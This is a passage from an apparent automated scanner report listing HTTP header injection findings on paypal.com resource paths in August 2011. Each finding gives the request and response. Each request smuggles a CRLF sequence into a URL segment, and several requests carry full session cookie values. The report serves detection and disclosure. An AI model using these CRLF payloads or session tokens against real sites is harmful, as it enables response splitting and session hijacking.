Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:40:28 GMT
Server: Apache
Location: https://www.paypalobjects.com/9f592
5da3fba8eab/i/header/header_bg.gif
Content-Length: 279
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.35. https://www.paypal.com/en_US/i/header/header_bg.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/header/header_bg.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f38d5%0d%0a5eddd43d7f2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/f38d5%0d%0a5eddd43d7f2/header/header_bg.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_flow&SESSION=M5rZd4ZZP2gDMdA2Lu9sOXevrynrQioy9AyKX2bWrhn8uW2M5rNBXVN3X5S&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:40:32 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/f38d5
5eddd43d7f2/header/header_bg.gif
Content-Length: 283
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.36. https://www.paypal.com/en_US/i/header/header_bg.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/header/header_bg.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c89ff%0d%0adc8aa38e7ee was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/c89ff%0d%0adc8aa38e7ee/header_bg.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_flow&SESSION=M5rZd4ZZP2gDMdA2Lu9sOXevrynrQioy9AyKX2bWrhn8uW2M5rNBXVN3X5S&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:40:35 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/c89ff
dc8aa38e7ee/header_bg.gif
Content-Length: 278
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.37. https://www.paypal.com/en_US/i/help/hero_banner_home_695x190.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/help/hero_banner_home_695x190.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dcc3b%0d%0aa0df733f064 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dcc3b%0d%0aa0df733f064/i/help/hero_banner_home_695x190.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/cgi-bin/helpweb?cmd=_help
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_registration-run; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:23:30 GMT
Server: Apache
Location: https://www.paypalobjects.com/dcc3b
a0df733f064/i/help/hero_banner_home_695x190.jpg
Content-Length: 292
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.38. https://www.paypal.com/en_US/i/help/hero_banner_home_695x190.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/help/hero_banner_home_695x190.jpg

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 829ce%0d%0a13f91d6a745 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/829ce%0d%0a13f91d6a745/help/hero_banner_home_695x190.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/cgi-bin/helpweb?cmd=_help
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_registration-run; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:23:34 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/829ce
13f91d6a745/help/hero_banner_home_695x190.jpg
Content-Length: 296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.39. https://www.paypal.com/en_US/i/help/hero_banner_home_695x190.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/help/hero_banner_home_695x190.jpg

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e5b54%0d%0aade96f94467 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/e5b54%0d%0aade96f94467/hero_banner_home_695x190.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/cgi-bin/helpweb?cmd=_help
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_registration-run; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:23:37 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/e5b54
ade96f94467/hero_banner_home_695x190.jpg
Content-Length: 293
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.40. https://www.paypal.com/en_US/i/icon/pp_favicon_x.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/icon/pp_favicon_x.ico

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b9c22%0d%0a3f4773fdc58 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/b9c22%0d%0a3f4773fdc58/pp_favicon_x.ico HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:43 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/b9c22
3f4773fdc58/pp_favicon_x.ico
Content-Length: 281
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.41. https://www.paypal.com/en_US/i/pui/core/btn_bg_sprite.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/btn_bg_sprite.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1d19f%0d%0a251a1dc1312 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1d19f%0d%0a251a1dc1312/i/pui/core/btn_bg_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:56 GMT
Server: Apache
Location: https://www.paypalobjects.com/1d19f
251a1dc1312/i/pui/core/btn_bg_sprite.gif
Content-Length: 285
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.42. https://www.paypal.com/en_US/i/pui/core/btn_bg_sprite.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/btn_bg_sprite.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b23e9%0d%0ae2f00b27246 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/b23e9%0d%0ae2f00b27246/pui/core/btn_bg_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; 